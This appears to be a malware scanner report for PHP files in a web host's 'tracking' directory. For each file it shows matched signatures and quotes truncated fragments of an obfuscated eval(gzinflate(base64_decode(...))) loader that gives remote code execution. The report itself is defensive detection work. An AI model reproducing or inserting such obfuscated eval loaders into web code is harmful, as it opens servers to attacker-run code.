<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1V32/aSBB+R+J/mFooGImE11PLD9Fg5ZDaJgek93CqrGU9jre1d+nuOg536v9+s7YBE0rbSPUD2J5vvplvPDPbbg0GcymsYOJfIR/AJggGjRFKtlv1TWgs09bvvWm32gSfYSzkDitZhqBi2LAHbLc67g9G4G2USkOZZ2vUXu02lzzNI+cnkRMx01uIRYqm3dL4NRcaQyU5QleUQBzkVqRXm2TTfXMOYQuRChUmyCLUO2h7ryg9SJq9BbX+jNxSjtGaMpRY0MtS00Oq1iyFziK4vl3M5h9uliWLiMF/hdnGbv1OuAj+ug+Wq3+6C+RKOxX3Ou1+6vXgv3YL6BKxL4xB28QW88hBaoS7OsZmlqJTDpdjnhursuAJeW7R9+7vZtNVAJylaSgedViI6AEtLIMVcCUtShva7cZVt1tlGk7vZ/Pbbn9nJssE/v4zWARAkd2...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/act_settings.php

Size: 17.82 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19a3vbOK7w93me+Q+s2jN2trGdS2+Ti3sSx00ziZNs7LSn0+nxI1u0rUaWvLokTWf731+ApO4UJadp58y79e40tgSCIAiAAHj7+adWqzOj4ysycVwyduyJOW02f/7JnJD6g4lp0SH9ZHq+V9dMe2wFBm0JmMVsoa2skD9//onAxzBpXdsZtQcz6lJiekS3CXVdx22SDoMniIvYjg/1BLbRJOcW1T1KXNowbc/XLYvw+n197BMvWCwc12/utEZtbWX755++/PyTRz3PdOwhALt+HR+69F+B6dKhY49pvRbSF/imhdTVEOTnnx4t9Cklu0TTjblp4w8Nnj8yRvDMpjfkYJ/hejR25gvdNqkHz+Ftoz2l/p5ldcLHdY6u1ToHki1HNwhjmydYZXoe9euPhv1uv390dvq+FnjUHZpG7UPMpBnVDerWtRNnrPvQlC1iOVPT5qzc5jDAbZ+3F9Em8C2oOzcZB2ofyA5Zj7C...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3vbOK7w93me+Q+s2jN2trGdS2+Ti3sSx00ziZNs7LSn0+nxI1u0rUaWvLokTWf731+ApO4UJadp58y79e40tgSCIAiAAHj7+adWqzOj4ysycVwyduyJOW02f/7JnJD6g4lp0SH9ZHq+V9dMe2wFBm0JmMVsoa2skD9//onAxzBpXdsZtQcz6lJiekS3CXVdx22SDoMniIvYjg/1BLbRJOcW1T1KXNowbc/XLYvw+n197BMvWCwc12/utEZtbWX755++/PyTRz3PdOwhALt+HR+69F+B6dKhY49pvRbSF/imhdTVEOTnnx4t9Cklu0TTjblp4w8Nnj8yRvDMpjfkYJ/hejR25gvdNqkHz+Ftoz2l/p5ldcLHdY6u1ToHki1HNwhjmydYZXoe9euPhv1uv390dvq+FnjUHZpG7UPMpBnVDerWtRNnrPvQlC1iOVP...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3vbOK7w93me+Q+s2jN2trGdS2+Ti3sSx00ziZNs7LSn0+nxI1u0rUaWvLokTWf731+ApO4UJadp58y79e40tgSCIAiAAHj7+adWqzOj4ysycVwyduyJOW02f/7JnJD6g4lp0SH9ZHq+V9dMe2wFBm0JmMVsoa2skD9//onAxzBpXdsZtQcz6lJiekS3CXVdx22SDoMniIvYjg/1BLbRJOcW1T1KXNowbc/XLYvw+n197BMvWCwc12/utEZtbWX755++/PyTRz3PdOwhALt+HR+69F+B6dKhY49pvRbSF/imhdTVEOTnnx4t9Cklu0TTjblp4w8Nnj8yRvDMpjfkYJ/hejR25gvdNqkHz+Ftoz2l/p5ldcLHdY6u1ToHki1HNwhjmydYZXoe9euPhv1uv390dvq+FnjUHZpG7UPMpBnVDerWtRNnrPvQlC1iOVP...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/handle_message.php

Size: 1.83 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEALVY62/bNhD/7AD5H1jBiOTBaTbs01rYRZa4WIA81tjZPgSBQEu0w0UPl6TywJr/fXckJUuyJDtYe2hh5XjP3x2Povb39vcE+5pxwfw0CZjn8iSIspAdBWmy4Mv3q/uVO/jYJpQpHm0RmTLxyAMmj2ZPPOJpozRxCq8RlRJlYsojJvDJqZuuCTMUVSxeRVQxreug/X44JyOSsCdy+ruHDGCxZ8US4Pb968mXm8l0dutqlnuHCpmIqmvXLEhFyJPljYi0yP4eXxAPLB+Ol0z9RYXnxFQ++CIXlM6AjEbEUSJj8Pjv/h4BspZvAKwPH1Bhbfj63MNVjO9VhxjQCPL2eVgN5USzbRB9GauVn0kmEhozFCxHVFk0UGjWCsB6AreN8vmiY5BaRumcRqQ/PZtN/Mvji4lN3ltz3o0cZ2Dzk1wxP4+lrMMiyRpkHEyHzAQNHgAEp0BWKhGxxDN1GpCDA5JzECONZw/+HR1J+sh...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALVY62/bNhD/7AD5H1jBiOTBaTbs01rYRZa4WIA81tjZPgSBQEu0w0UPl6TywJr/fXckJUuyJDtYe2hh5XjP3x2Povb39vcE+5pxwfw0CZjn8iSIspAdBWmy4Mv3q/uVO/jYJpQpHm0RmTLxyAMmj2ZPPOJpozRxCq8RlRJlYsojJvDJqZuuCTMUVSxeRVQxreug/X44JyOSsCdy+ruHDGCxZ8US4Pb968mXm8l0dutqlnuHCpmIqmvXLEhFyJPljYi0yP4eXxAPLB+Ol0z9RYXnxFQ++CIXlM6AjEbEUSJj8Pjv/h4BspZvAKwPH1Bhbfj63MNVjO9VhxjQCPL2eVgN5USzbRB9GauVn0kmEhozFCxHVFk0UGjWCsB6AreN8vmiY5BaRumcRqQ/PZtN/Mvji4lN3ltz3o0cZ2Dzk1wxP4+lrMMiyRpkHEyHzAQNHgA...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALVY62/bNhD/7AD5H1jBiOTBaTbs01rYRZa4WIA81tjZPgSBQEu0w0UPl6TywJr/fXckJUuyJDtYe2hh5XjP3x2Povb39vcE+5pxwfw0CZjn8iSIspAdBWmy4Mv3q/uVO/jYJpQpHm0RmTLxyAMmj2ZPPOJpozRxCq8RlRJlYsojJvDJqZuuCTMUVSxeRVQxreug/X44JyOSsCdy+ruHDGCxZ8US4Pb968mXm8l0dutqlnuHCpmIqmvXLEhFyJPljYi0yP4eXxAPLB+Ol0z9RYXnxFQ++CIXlM6AjEbEUSJj8Pjv/h4BspZvAKwPH1Bhbfj63MNVjO9VhxjQCPL2eVgN5USzbRB9GauVn0kmEhozFCxHVFk0UGjWCsB6AreN8vmiY5BaRumcRqQ/PZtN/Mvji4lN3ltz3o0cZ2Dzk1wxP4+lrMMiyRpkHEyHzAQNHgA...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_ad_add_campaign.php

Size: 13.73 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19+3fbOK7wz9tz+j+wanZs38Z20se0m1c3k2Tm5py+btPMvXt7+/nIFm2rlSWvJOcxnf7vHwCSEiVRsvxI2pmpdqexJRIAQRAEQEC+e6fbPfXd2LXd31x/xOIxZxGPIjfw796RH3pRbIdxs7V7985daH7Mh66v2vr2hLNgyKb2iN+9s4F/2D6zbKdnz+Kg57i2x0NL9jz1B97Mwa4+HwBsO7xmQ9fj0d07If/3zA15L/AHvNlwqSHvzmLX60zH0wbiNjd5Y49c346BTGNDljSML13PDXpjbjs8pLZElTts/nPDG3h7D1uf795hcIkWTetFMCC4O8z1HX6FXSwEj234lRvDxy/5cSFLPLcf4sgOgQHsmBjAbN9hvwYu0PNTGNjOwI5i08hTarMM7FHbLkDGB/CnN5z5gygdhZpEL53F459Y0P/IBzFMi9OHSfH5JdykaRx5Qd/22Mbbk6PXb49PX/1yZoISAJiQybY...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19+3fbOK7wz9tz+j+wanZs38Z20se0m1c3k2Tm5py+btPMvXt7+/nIFm2rlSWvJOcxnf7vHwCSEiVRsvxI2pmpdqexJRIAQRAEQEC+e6fbPfXd2LXd31x/xOIxZxGPIjfw796RH3pRbIdxs7V7985daH7Mh66v2vr2hLNgyKb2iN+9s4F/2D6zbKdnz+Kg57i2x0NL9jz1B97Mwa4+HwBsO7xmQ9fj0d07If/3zA15L/AHvNlwqSHvzmLX60zH0wbiNjd5Y49c346BTGNDljSML13PDXpjbjs8pLZElTts/nPDG3h7D1uf795hcIkWTetFMCC4O8z1HX6FXSwEj234lRvDxy/5cSFLPLcf4sgOgQHsmBjAbN9hvwYu0PNTGNjOwI5i08hTarMM7FHbLkDGB/CnN5z5gygdhZpEL53F459Y0P/IBzFMi9OHSfH5Jdy...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19+3fbOK7wz9tz+j+wanZs38Z20se0m1c3k2Tm5py+btPMvXt7+/nIFm2rlSWvJOcxnf7vHwCSEiVRsvxI2pmpdqexJRIAQRAEQEC+e6fbPfXd2LXd31x/xOIxZxGPIjfw796RH3pRbIdxs7V7985daH7Mh66v2vr2hLNgyKb2iN+9s4F/2D6zbKdnz+Kg57i2x0NL9jz1B97Mwa4+HwBsO7xmQ9fj0d07If/3zA15L/AHvNlwqSHvzmLX60zH0wbiNjd5Y49c346BTGNDljSML13PDXpjbjs8pLZElTts/nPDG3h7D1uf795hcIkWTetFMCC4O8z1HX6FXSwEj234lRvDxy/5cSFLPLcf4sgOgQHsmBjAbN9hvwYu0PNTGNjOwI5i08hTarMM7FHbLkDGB/CnN5z5gygdhZpEL53F459Y0P/IBzFMi9OHSfH5Jdy...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/record_call.php

Size: 5.24 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEALUbf3fbtvFv5z1/B5jPK8lVluy02+tzKrmupDRenTiT5O6taR4fTUIWZ4rUSDC2u/i77w4ASZAEKTnd5KaxgLvD4X7jgOy/2IefhP47CxLqxJFHLTOIvDDz6cCLo2Vw29+sNqb9qg0oY0G4BcS/2QIwp8mnwKPpYHEfhEG8K/Tdegsk4+ScFXV9mhSw+y8O/RsyJBG9J5MfLTF0G8Y3bkgOzz0vziI2D/wefMnYahHf0QhADr0woBGTeDkPjuDYasGTyzmz6d+vp/PFB/N1Eq/Nj0AkZYmT0E3oAr8GMXrG10YvS0KferFPrQaGjZSU0UUMVMhz6CBGncokcMOxG4ac2jNoqXi22OP+i2BJLPKDAkUfAuYsgX0HDYkmFHSD6wzNE9Mm/9l/ARsgh2wVpE6W0sSBv91bIeKlG6b0lYQAeTsbN2GBF2zciKUw7yaJ+8g1xyFK+k7krikAsCRYqxzXIIDtHDdlK4AHizg...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALUbf3fbtvFv5z1/B5jPK8lVluy02+tzKrmupDRenTiT5O6taR4fTUIWZ4rUSDC2u/i77w4ASZAEKTnd5KaxgLvD4X7jgOy/2IefhP47CxLqxJFHLTOIvDDz6cCLo2Vw29+sNqb9qg0oY0G4BcS/2QIwp8mnwKPpYHEfhEG8K/Tdegsk4+ScFXV9mhSw+y8O/RsyJBG9J5MfLTF0G8Y3bkgOzz0vziI2D/wefMnYahHf0QhADr0woBGTeDkPjuDYasGTyzmz6d+vp/PFB/N1Eq/Nj0AkZYmT0E3oAr8GMXrG10YvS0KferFPrQaGjZSU0UUMVMhz6CBGncokcMOxG4ac2jNoqXi22OP+i2BJLPKDAkUfAuYsgX0HDYkmFHSD6wzNE9Mm/9l/ARsgh2wVpE6W0sSBv91bIeKlG6b0lYQAeTsbN2GBF2zciKUw7yaJ+8g...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALUbf3fbtvFv5z1/B5jPK8lVluy02+tzKrmupDRenTiT5O6taR4fTUIWZ4rUSDC2u/i77w4ASZAEKTnd5KaxgLvD4X7jgOy/2IefhP47CxLqxJFHLTOIvDDz6cCLo2Vw29+sNqb9qg0oY0G4BcS/2QIwp8mnwKPpYHEfhEG8K/Tdegsk4+ScFXV9mhSw+y8O/RsyJBG9J5MfLTF0G8Y3bkgOzz0vziI2D/wefMnYahHf0QhADr0woBGTeDkPjuDYasGTyzmz6d+vp/PFB/N1Eq/Nj0AkZYmT0E3oAr8GMXrG10YvS0KferFPrQaGjZSU0UUMVMhz6CBGncokcMOxG4ac2jNoqXi22OP+i2BJLPKDAkUfAuYsgX0HDYkmFHSD6wzNE9Mm/9l/ARsgh2wVpE6W0sSBv91bIeKlG6b0lYQAeTsbN2GBF2zciKUw7yaJ+8g...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_ad_campaigns.php

Size: 5.22 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0ca3PbNvJzM+P/gLBuJM1Zkp2bybR6uW7spJ5JnZytdNpLOxyKhCTUEMGSoG21l/9+uwD4FCVRcud6mZZfLFGLxWLfuwB88KTbvfSZZA77jfkzIueURDSKmPAPnpgPdiSdUDZb/YMnBwB+TqfMT2B9Z0GJmJLAmdGDJ4f4hwyJ5Xi2E0the8zhNLTMyEvf5bGHQ33qAm4nXJIp4zQ6eBLSX2MWUlv4Lm02mAKk3Vgy3gnmQQPnrgZ558yY70ggsxKQpIDynnEm7Dl1PBoqWEUVmza/PuQuHzxv/X7whMCjIZrWG+EqvD3CfI8+4BAL0SMMfWASPn4srwtZwtkkxJWdAQPIuWIAcXyPfC8Y0PNNKBzPdSJZtfKM2iIDbQXbBcz4A/yxp7HvRtkqEiHyTIrn3xAx+YW6koBcvAlIxaf38DaVY2GEgCEhmXExcTi5c0LmTGBGQORI4oSUGCq9zsGT1xro8Mx1RezLG+Y...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ca3PbNvJzM+P/gLBuJM1Zkp2bybR6uW7spJ5JnZytdNpLOxyKhCTUEMGSoG21l/9+uwD4FCVRcud6mZZfLFGLxWLfuwB88KTbvfSZZA77jfkzIueURDSKmPAPnpgPdiSdUDZb/YMnBwB+TqfMT2B9Z0GJmJLAmdGDJ4f4hwyJ5Xi2E0the8zhNLTMyEvf5bGHQ33qAm4nXJIp4zQ6eBLSX2MWUlv4Lm02mAKk3Vgy3gnmQQPnrgZ558yY70ggsxKQpIDynnEm7Dl1PBoqWEUVmza/PuQuHzxv/X7whMCjIZrWG+EqvD3CfI8+4BAL0SMMfWASPn4srwtZwtkkxJWdAQPIuWIAcXyPfC8Y0PNNKBzPdSJZtfKM2iIDbQXbBcz4A/yxp7HvRtkqEiHyTIrn3xAx+YW6koBcvAlIxaf38DaVY2GEgCEhmXExcTi5c0L...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ca3PbNvJzM+P/gLBuJM1Zkp2bybR6uW7spJ5JnZytdNpLOxyKhCTUEMGSoG21l/9+uwD4FCVRcud6mZZfLFGLxWLfuwB88KTbvfSZZA77jfkzIueURDSKmPAPnpgPdiSdUDZb/YMnBwB+TqfMT2B9Z0GJmJLAmdGDJ4f4hwyJ5Xi2E0the8zhNLTMyEvf5bGHQ33qAm4nXJIp4zQ6eBLSX2MWUlv4Lm02mAKk3Vgy3gnmQQPnrgZ558yY70ggsxKQpIDynnEm7Dl1PBoqWEUVmza/PuQuHzxv/X7whMCjIZrWG+EqvD3CfI8+4BAL0SMMfWASPn4srwtZwtkkxJWdAQPIuWIAcXyPfC8Y0PNNKBzPdSJZtfKM2iIDbQXbBcz4A/yxp7HvRtkqEiHyTIrn3xAx+YW6koBcvAlIxaf38DaVY2GEgCEhmXExcTi5c0L...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/index.php

Size: 7.83 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09/XfbNpI/J+/lf0AYb0ldJEpKLs1WX6ljq6n3HDtny73rOn56lAhJbChSS1J2nK7/95sBwE+REknZcdIzdl9jkcBgMBjMDGYG4JPHTx7X63szOv5EJrZDxrY1Maaq+uSxMVEmhkmH9LPheq4iGdbYXOq0LmosZgupQrpdMtFMl1aePP7zyWMCRTeoInVGvcGMOpQYLtEsQh3HdlSyx1oShEos24P+lpaukg8m1VxKHFozLNfTTJNwPDxt7BF3uVjYjqd26qOeVGk/eXzz5LFLXdewrSFUdjwFHzr0X0vDoUPbGlNF9jFdeoaJeMrZVT5oU8PSPIAWVNzRR6RLLHpF9t8y4FPTHmkm2Tnp7x2f7B8cvTuFh0i199Sb2ToZA8ouo9fPO8PT/unpwfHRubygztxgeMoXpEOaFU6enbE9X2iWQV3oBLqq9abU2zXNPf/xL7Zz5lInBmsJD4aGLl8gOhTInRMWQx8xJce...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XfbNpI/J+/lf0AYb0ldJEpKLs1WX6ljq6n3HDtny73rOn56lAhJbChSS1J2nK7/95sBwE+REknZcdIzdl9jkcBgMBjMDGYG4JPHTx7X63szOv5EJrZDxrY1Maaq+uSxMVEmhkmH9LPheq4iGdbYXOq0LmosZgupQrpdMtFMl1aePP7zyWMCRTeoInVGvcGMOpQYLtEsQh3HdlSyx1oShEos24P+lpaukg8m1VxKHFozLNfTTJNwPDxt7BF3uVjYjqd26qOeVGk/eXzz5LFLXdewrSFUdjwFHzr0X0vDoUPbGlNF9jFdeoaJeMrZVT5oU8PSPIAWVNzRR6RLLHpF9t8y4FPTHmkm2Tnp7x2f7B8cvTuFh0i199Sb2ToZA8ouo9fPO8PT/unpwfHRubygztxgeMoXpEOaFU6enbE9X2iWQV3oBLqq9abU2zXNPf/...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XfbNpI/J+/lf0AYb0ldJEpKLs1WX6ljq6n3HDtny73rOn56lAhJbChSS1J2nK7/95sBwE+REknZcdIzdl9jkcBgMBjMDGYG4JPHTx7X63szOv5EJrZDxrY1Maaq+uSxMVEmhkmH9LPheq4iGdbYXOq0LmosZgupQrpdMtFMl1aePP7zyWMCRTeoInVGvcGMOpQYLtEsQh3HdlSyx1oShEos24P+lpaukg8m1VxKHFozLNfTTJNwPDxt7BF3uVjYjqd26qOeVGk/eXzz5LFLXdewrSFUdjwFHzr0X0vDoUPbGlNF9jFdeoaJeMrZVT5oU8PSPIAWVNzRR6RLLHpF9t8y4FPTHmkm2Tnp7x2f7B8cvTuFh0i199Sb2ToZA8ouo9fPO8PT/unpwfHRubygztxgeMoXpEOaFU6enbE9X2iWQV3oBLqq9abU2zXNPf/...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_ad_dialing_details.php

Size: 15.42 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19bXfbNrLw5/ac/geEyYZUrRc7SdPWttx1HXdv9qZJbpzsPs/N5uhQIiQxoUiVpOw4u/nvd2YA8BV8k+0kuy13T2ORwGBmAAxmBoPBN1+PRo99N3Zt94PrL1i85CziUeQG/jdfyz8mUWyHsdU7+Obrb6D4Iz53fVXWt1ecBXO2thf8m6/v4D9szAzbmdibOJg4ru3x0JA1H/szb+NgVZ/PALYdXrK56/Hom69D/tvGDfkk8GecmS4V5KNN7HrD9XJtHlSVeG4vXN+OAcv6cvGF67nBZMlth4eq6Ddfu3Prz3e8mXd4r/fPb75m8IgSlvEkmBHYfeb6Dn+PVQzkAJbh790Y/vxYpAoZ4rnTEOk6BvLZIyKf2b7D/ha4gM/PYWA7MzuK6+nOs29CZUcAGT/AP5P5xp9FKRWqC720Dx/9zILpWz6LoVOcKXSJzy/gJXXiwgumtsfuvDg9efbi0eOnfznTQQkATMhk2XM...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbNrLw5/ac/geEyYZUrRc7SdPWttx1HXdv9qZJbpzsPs/N5uhQIiQxoUiVpOw4u/nvd2YA8BV8k+0kuy13T2ORwGBmAAxmBoPBN1+PRo99N3Zt94PrL1i85CziUeQG/jdfyz8mUWyHsdU7+Obrb6D4Iz53fVXWt1ecBXO2thf8m6/v4D9szAzbmdibOJg4ru3x0JA1H/szb+NgVZ/PALYdXrK56/Hom69D/tvGDfkk8GecmS4V5KNN7HrD9XJtHlSVeG4vXN+OAcv6cvGF67nBZMlth4eq6Ddfu3Prz3e8mXd4r/fPb75m8IgSlvEkmBHYfeb6Dn+PVQzkAJbh790Y/vxYpAoZ4rnTEOk6BvLZIyKf2b7D/ha4gM/PYWA7MzuK6+nOs29CZUcAGT/AP5P5xp9FKRWqC720Dx/9zILpWz6LoVOcKXSJzy/gJXX...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbNrLw5/ac/geEyYZUrRc7SdPWttx1HXdv9qZJbpzsPs/N5uhQIiQxoUiVpOw4u/nvd2YA8BV8k+0kuy13T2ORwGBmAAxmBoPBN1+PRo99N3Zt94PrL1i85CziUeQG/jdfyz8mUWyHsdU7+Obrb6D4Iz53fVXWt1ecBXO2thf8m6/v4D9szAzbmdibOJg4ru3x0JA1H/szb+NgVZ/PALYdXrK56/Hom69D/tvGDfkk8GecmS4V5KNN7HrD9XJtHlSVeG4vXN+OAcv6cvGF67nBZMlth4eq6Ddfu3Prz3e8mXd4r/fPb75m8IgSlvEkmBHYfeb6Dn+PVQzkAJbh790Y/vxYpAoZ4rnTEOk6BvLZIyKf2b7D/ha4gM/PYWA7MzuK6+nOs29CZUcAGT/AP5P5xp9FKRWqC720Dx/9zILpWz6LoVOcKXSJzy/gJXX...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/handle_transcription.php

Size: 1.05 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJVUaW+bQBD9bsn/Ybp1C259fKd12hxUiZSjNThVZLtoDWtnG2DJLti10vz37gGGXIqKhLQMb473ZmbbrXaLk9uCchKwNCS2RdMwLiIyDFm6pKtBdp1Z3U8vgYqcxq9APMLXNCRi6G9oTNkO3YkWMIKUbODowFYGaZI5pS3ZituYBvIjJWFud44OguMLz++pw8Rzx/rwfd/zlFcJFiSW2CBa2CpIDxTkfP/MhTLyksY54aCeEaA3X992fr1/98Hufhz1p/PZ8O7+r/N570tvgFRlnISMRzRdKXDGySrgJIuxZIWG0zLUfIh6gOTbCcbuj4nr+VNrXPlNeGzNNcmc41SEnGb5/4Xyd36UpT75k5t47RZdgi2l6++tSH6JuY0SLG6CXcUCdWEkGea8IPJ4124pyg1GI5jInjmOcqvrHZ/aNUYlujeqcZZoxRqVfZM2a665scf/fKb/6E4mGU63AY0Uoqz30BjZ8hDHsd3...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVUaW+bQBD9bsn/Ybp1C259fKd12hxUiZSjNThVZLtoDWtnG2DJLti10vz37gGGXIqKhLQMb473ZmbbrXaLk9uCchKwNCS2RdMwLiIyDFm6pKtBdp1Z3U8vgYqcxq9APMLXNCRi6G9oTNkO3YkWMIKUbODowFYGaZI5pS3ZituYBvIjJWFud44OguMLz++pw8Rzx/rwfd/zlFcJFiSW2CBa2CpIDxTkfP/MhTLyksY54aCeEaA3X992fr1/98Hufhz1p/PZ8O7+r/N570tvgFRlnISMRzRdKXDGySrgJIuxZIWG0zLUfIh6gOTbCcbuj4nr+VNrXPlNeGzNNcmc41SEnGb5/4Xyd36UpT75k5t47RZdgi2l6++tSH6JuY0SLG6CXcUCdWEkGea8IPJ4124pyg1GI5jInjmOcqvrHZ/aNUYlujeqcZZoxRqVfZM2a66...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVUaW+bQBD9bsn/Ybp1C259fKd12hxUiZSjNThVZLtoDWtnG2DJLti10vz37gGGXIqKhLQMb473ZmbbrXaLk9uCchKwNCS2RdMwLiIyDFm6pKtBdp1Z3U8vgYqcxq9APMLXNCRi6G9oTNkO3YkWMIKUbODowFYGaZI5pS3ZituYBvIjJWFud44OguMLz++pw8Rzx/rwfd/zlFcJFiSW2CBa2CpIDxTkfP/MhTLyksY54aCeEaA3X992fr1/98Hufhz1p/PZ8O7+r/N570tvgFRlnISMRzRdKXDGySrgJIuxZIWG0zLUfIh6gOTbCcbuj4nr+VNrXPlNeGzNNcmc41SEnGb5/4Xyd36UpT75k5t47RZdgi2l6++tSH6JuY0SLG6CXcUCdWEkGea8IPJ4124pyg1GI5jInjmOcqvrHZ/aNUYlujeqcZZoxRqVfZM2a66...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_ad_edit_campaign.php

Size: 14.47 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19bXfbOK7w551z+h9YNVvZt7GdtNNpJ4nTzbSZ2Z7Tt9s0c+/ebh8f2aZttbLkleSkmW7/+wOApERJ1Itf2unMxnt26sgkCIIACIAAdeO7Xu+p78au4/7m+lMWzziLeBS5gX/jO/llEMVOGLfahze+u0HNR95yjI19PoIWTnjFJq7HoxvfhfxfSzfkg8Af8ZbtUkPeW8au113MFjZCMDd55Uxd34lhMGNDljSML13PDQYz7ox5SG0JK3fS+tuON/KO7rY/3fiOwUe0aFnPghHBPWCuP+YfsYuF4LEN/+jG8PVzfl5IBM8dhjizk2UcsCeu4/GQOf6Y/Rq4gM9PYeCMR04Um2aeYuuMBw70H4yp/4Da9gAy/gD/DCZLfxSls1BL4aVr8eQnFgzf81F847ud8ZD1geaX8JAWY+oFQ8djO69PH798/eTpi1/OTFACABMy2fbCCV1nCFgAcCdmTsiZxHzcvfHdLxLgyWg...

Exploit execution Line: 3 Dangerous

